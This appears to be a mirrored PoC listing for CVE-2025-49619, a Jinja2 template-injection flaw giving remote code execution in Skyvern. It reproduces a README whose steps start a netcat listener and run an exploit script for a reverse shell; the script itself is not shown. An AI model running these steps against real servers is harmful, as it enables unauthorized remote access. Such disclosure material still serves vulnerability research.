CVE-2025-49619 PoC — Ikonomos Skyvern 安全漏洞

Source

https://github.com/cristibtz/CVE-2025-49619

Associated Vulnerability

Title:Ikonomos Skyvern 安全漏洞 (CVE-2025-49619)
Description:Skyvern through 0.1.85 is vulnerable to server-side template injection (SSTI) in the Prompt field of workflow blocks such as the Navigation v2 Block. Improper sanitization of Jinja2 template input allows authenticated users to inject crafted expressions that are evaluated on the server, leading to blind remote code execution (RCE).

Description

This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.

Readme

# CVE-2025-49619 PoC

---

**This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.**

---

## Author

- **Name:** Cristian Branet  
- **GitHub:** [cristibtz](https://github.com/cristibtz)

---

## Usage

### 1. Start a listener

```bash
nc -lvnp <PORT>
```

### 2. Run the exploit

```bash
python3 exploit.py -u "http://<TARGET_IP>:<TARGET_PORT>" -k "<X-API-KEY>" -i <LOCAL_IP> -p <PORT>
```

- `<TARGET_IP>`: Skyvern server IP
- `<TARGET_PORT>`: Skyvern server port
- `<X-API-KEY>`: Your Skyvern API key (Settings → API Key)
- `<LOCAL_IP>`: Your IP to receive the reverse shell
- `<PORT>`: Port for the reverse shell (must match your listener)

---

**Disclaimer:**  
This code is for educational and authorized testing purposes only.

File Snapshot


 [4.0K]  /data/pocs/0fbd31fd4286ba1dc1f81fd530db601f641f895b
├── [4.4K]  exploit.py
├── [ 916]  exploit-workflow.json
├── [ 766]  README.md
└── [  27]  requirements.txt

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!